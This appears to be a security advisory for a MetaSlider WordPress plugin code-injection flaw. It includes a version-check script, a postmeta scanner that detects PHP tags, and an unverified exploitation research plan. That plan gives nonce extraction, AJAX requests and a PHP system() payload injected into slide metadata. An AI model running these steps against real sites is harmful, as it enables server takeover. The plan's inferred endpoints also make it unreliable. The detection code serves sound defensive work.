CVE-2026-39465

Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider <= 3.106.0 - Authenticated (Editor+) Remote Code Execution

Severity: High
Weakness: Improper Control of Generation of Code ('Code Injection')
CVSS Score: 7.2
Patched in: 3.107.0
Time to patch: 11d

Description

The Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.106.0. This makes it possible for authenticated attackers, with Editor-level access and above, to execute code on the server.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 3.106.0
Published: April 20, 2026
Last updated: April 30, 2026
Affected plugin: ml-slider
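Before working through the plan below, the first thing a practitioner wants is a reliable way to tell whether an installed copy falls inside the affected range. The following is an added example, not code from the advisory or from the MetaSlider project: it reads the Version: line of a standard WordPress plugin header and compares it numerically against the advisory's <= 3.106.0 boundary. A plain string or float comparison is wrong for this: 3.106 versus 3.107 happens to sort correctly as text, but 3.9 versus 3.10 does not. The path wp-content/plugins/ml-slider/ml-slider.php is an assumption about the plugin's main file, and the sample header is constructed.

```python
# Added example (not from the advisory or from MetaSlider): decide whether an
# installed ml-slider falls inside the affected range "<= 3.106.0" by reading
# the "Version:" line of the plugin's main file header.
import re
import sys
from pathlib import Path
from typing import Optional, Tuple

AFFECTED_MAX = "3.106.0"   # last vulnerable release per the advisory
PATCHED_IN = "3.107.0"     # first fixed release per the advisory

# Assumed location of the plugin's main file inside a WordPress install.
DEFAULT_PLUGIN_FILE = "wp-content/plugins/ml-slider/ml-slider.php"


def parse_version(s: str) -> Tuple[int, ...]:
    """Turn '3.106.0', '3.106' or '3.107.0-beta' into an int tuple (padded to 3 parts)."""
    m = re.match(r"\d+(?:\.\d+)*", s.strip())
    if not m:
        raise ValueError(f"unparseable version: {s!r}")
    parts = [int(p) for p in m.group(0).split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(installed: str) -> bool:
    """True when the installed version is <= the last vulnerable release."""
    return parse_version(installed) <= parse_version(AFFECTED_MAX)


# Matches the "Version:" line of a WordPress plugin header comment block.
HEADER_RE = re.compile(r"^\s*\*?\s*Version:\s*([\w.\-]+)", re.MULTILINE)


def version_from_plugin_header(header_text: str) -> Optional[str]:
    m = HEADER_RE.search(header_text)
    return m.group(1) if m else None


def check_plugin_file(path: str) -> Optional[bool]:
    """Return True/False for affected/not affected, None if no Version: header."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")[:8192]
    v = version_from_plugin_header(text)
    return None if v is None else is_affected(v)


# Constructed sample header in the standard WordPress plugin header format.
SAMPLE_HEADER = """<?php
/*
 * Plugin Name: MetaSlider
 * Version: 3.106.0
 */
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = check_plugin_file(sys.argv[1])
        if result is None:
            print("no Version: header found")
        else:
            print("AFFECTED (update to %s or later)" % PATCHED_IN if result else "not affected")
    else:
        v = version_from_plugin_header(SAMPLE_HEADER)
        print("sample header version:", v, "affected:", is_affected(v))
```

Run it as `python3 check_metaslider.py /var/www/html/wp-content/plugins/ml-slider/ml-slider.php`. On a host with WP-CLI, `wp plugin get ml-slider --field=version` returns the same version string without reading the file, and it can be fed to is_affected directly.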

What Changed in the Fix

Changes introduced in v3.107.0


Source Code

WordPress.org SVN
Research Plan
Unverified


Research Plan: CVE-2026-39465 - MetaSlider Authenticated RCE

1. Vulnerability Summary

CVE-2026-39465 is a Remote Code Execution (RCE) vulnerability in the MetaSlider plugin (<= 3.106.0) affecting the ml-slider component. The working hypothesis of this plan is that the root cause is improper sanitization and control of slide metadata, specifically the "markup" or "template" fields used by slide types such as Post Feed or External slides: an attacker with Editor-level permissions injects PHP code into those metadata fields, and when the slideshow is rendered (in a preview or on a public page) the plugin processes that markup on the server, leading to code execution. The field names, endpoints and sink named below are inferred from the plugin source and have not been confirmed against the fix.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (AJAX) or the REST API /wp-json/metaslider/v1/.
  • Action: ms_save_slides (inferred for saving slide meta) or create_image_slide.
  • Vulnerable Parameter: slides[ID][meta][ml-slider_markup] or similar metadata keys associated with slide rendering.
  • Authentication: Authenticated, Editor or higher.
  • Preconditions: The attacker must be able to create or edit a slideshow.

3. Code Flow

  1. Entry Point (Client): The Slideshow.vue component calls this.saveSlides(slides) which sends an AJAX/REST request to save slide data.
  2. Entry Point (Server): The server-side handler for slide saving (e.g., MetaSlider_Slide->save_data()) receives the meta array.
  3. Data Persistence: The malicious payload <?php system('id'); ?> is saved into the wp_postmeta table for the specific slide (post type ml-slide).
  4. Execution Trigger: When an Editor clicks "Preview" (action=metaslider_preview) or a page with the slider is viewed, the MetaSlider_Slideshow->render() method is called.
  5. Sink: For Post Feed slides, the plugin retrieves the ml-slider_markup meta value and processes it. If the rendering engine uses eval() or an insecure template implementation, the PHP code is executed.

4. Nonce Acquisition Strategy

The admin/assets/dist/js/admin.js file indicates several nonces are localized into the metaslider global object.

Extraction Steps:

  1. Login as an Editor.
  2. Navigate to the MetaSlider dashboard: wp-admin/admin.php?page=metaslider.
  3. Execute JavaScript to extract the nonces:
    // Primary nonces for slide operations (key names inferred from admin.js;
    // verify them against the localized `metaslider` object in the page source)
    const nonces = {
        create: window.metaslider?.create_slide_nonce,
        update: window.metaslider?.update_slide_image_nonce,
        duplicate: window.metaslider?.duplicate_slide_nonce,
        save: window.metaslider?.save_nonce // Inferred key for saving settings/slides
    };
    // A bare `return` is a syntax error in the browser console; print instead
    console.table(nonces);
    
  4. If the specific save_nonce is missing, the create_slide_nonce is often used for broad slide management in this plugin.

5. Exploitation Strategy

Step 1: Create a Base Slideshow

Create a slideshow and an initial image slide to obtain necessary IDs.

  • Request:
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Method: POST
    • Body (URL-encoded):
      • action: create_image_slide
      • slider_id: (empty, which creates a new slider)
      • selection[]: [ATTACHMENT_ID] (Must have an image ID from Media Library)
      • _wpnonce: [create_slide_nonce]

Step 2: Extract IDs

The response will contain the slider_id and the slide_id.

  • Expected Response: {"success": true, "data": [{"slide_id": 123, "html": "..."}]}

Step 3: Inject RCE Payload

Modify the slide to a "Post Feed" type and inject the PHP payload into the markup.

  • Request:
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Method: POST
    • Body (URL-encoded):
      • action: ms_save_slides (or metaslider_save_slides)
      • _wpnonce: [save_nonce]
      • slides[123][meta][ml-slider_type]: post_feed
      • slides[123][meta][ml-slider_markup]: <?php system('id'); die; ?>

Step 4: Trigger Execution

Request the preview of the slider to trigger the server-side rendering of the malicious markup.

  • Request:
    • URL: http://localhost:8080/wp-admin/admin-ajax.php?action=metaslider_preview&id=[SLIDER_ID]
    • Method: GET

6. Test Data Setup

  1. Create Editor User: wp user create attacker attacker@example.com --role=editor --user_pass=password
  2. Upload Image: wp media import /path/to/test-image.jpg (needed for create_image_slide).
  3. Identify Attachment ID: Note the ID of the uploaded image (e.g., 5).

7. Expected Results

A successful exploit will result in the GET request to metaslider_preview returning the output of the id command (e.g., uid=33(www-data) ...).

8. Verification Steps

  1. Check Meta: Verify the payload was saved:
    wp post meta get [SLIDE_ID] ml-slider_markup
  2. Process List: Check for any suspicious processes spawned during the preview request.
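The verification step above checks a single known slide ID. For incident response on a site that was exposed while vulnerable, the useful form of that check is a sweep over every ml-slider meta value for PHP open tags. The following is an added example, not code from the advisory or from MetaSlider: it parses the tab-separated output of a `wp db query` against wp_postmeta (mysql batch format, which escapes tab, newline and backslash as \t, \n and \\) and reports rows whose value contains <?php or <?=. The wp_ table prefix and the ml-slider meta-key prefix are assumptions taken from this plan, and the sample rows are constructed.

```python
# Added example (not from the advisory or from MetaSlider): sweep exported
# wp_postmeta rows for PHP open tags in slide metadata. Expected input is the
# tab-separated output of, e.g.:
#   wp db query "SELECT post_id, meta_key, meta_value FROM wp_postmeta
#                WHERE meta_key LIKE 'ml-slider%'" > meta.tsv
# (table prefix wp_ and meta-key prefix ml-slider are assumptions)
import re
import sys
from typing import Iterator, List, Tuple

# <?php and <?= only; a bare "<?" would false-positive on "<?xml" in markup.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def mysql_unescape(field: str) -> str:
    """Undo mysql batch-mode escaping of tab, newline, NUL and backslash."""
    table = {"n": "\n", "t": "\t", "0": "\0", "\\": "\\"}
    out, i = [], 0
    while i < len(field):
        c = field[i]
        if c == "\\" and i + 1 < len(field):
            out.append(table.get(field[i + 1], field[i + 1]))
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def parse_rows(tsv: str) -> Iterator[Tuple[int, str, str]]:
    """Yield (post_id, meta_key, meta_value) from mysql batch output."""
    lines = tsv.splitlines()
    if lines and lines[0].startswith("post_id\t"):
        lines = lines[1:]  # column-name row, present unless --skip-column-names
    for line in lines:
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # blank or malformed line
        post_id, meta_key, meta_value = parts
        yield int(post_id), meta_key, mysql_unescape(meta_value)


def find_php_in_meta(tsv: str) -> List[Tuple[int, str, str]]:
    """Return (post_id, meta_key, snippet) for every value containing a PHP tag."""
    hits = []
    for post_id, key, value in parse_rows(tsv):
        m = PHP_TAG_RE.search(value)
        if m:
            snippet = value[max(0, m.start() - 20): m.end() + 40].replace("\n", "\\n")
            hits.append((post_id, key, snippet))
    return hits


# Constructed sample export: one benign slide and one with an injected payload.
SAMPLE_TSV = (
    "post_id\tmeta_key\tmeta_value\n"
    "123\tml-slider_type\tpost_feed\n"
    "123\tml-slider_markup\t<div class=\"slide\">\\n<?php system('id'); die; ?>\\n</div>\n"
    "124\tml-slider_type\timage\n"
    "124\tml-slider_markup\t<img src=\"x.jpg\">\n"
)

if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_TSV
    for post_id, key, snippet in find_php_in_meta(data):
        print(f"post {post_id} meta {key}: {snippet}")
```

Serialized arrays stored in postmeta are scanned as raw text, so a tag nested inside a serialized string is still caught. Payloads that rely on short_open_tag (a bare `<?`) or on encoding the tag are not matched; a hit on any slide is grounds to pull the full row with `wp post meta get [SLIDE_ID] [META_KEY]` and to review the slide's revision and author history.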

9. Alternative Approaches

If ms_save_slides fails:

  • REST API Path: Use POST /wp-json/metaslider/v1/slides/save with the same payload structure.
  • External Slide Type: Try ml-slider_type=external and look for a content or url field that might be evaluated.
  • Slider Settings: Target the settings[html] or settings[custom_css] fields in action=ms_save_settings. MetaSlider sometimes processes CSS through a server-side parser that might be vulnerable.
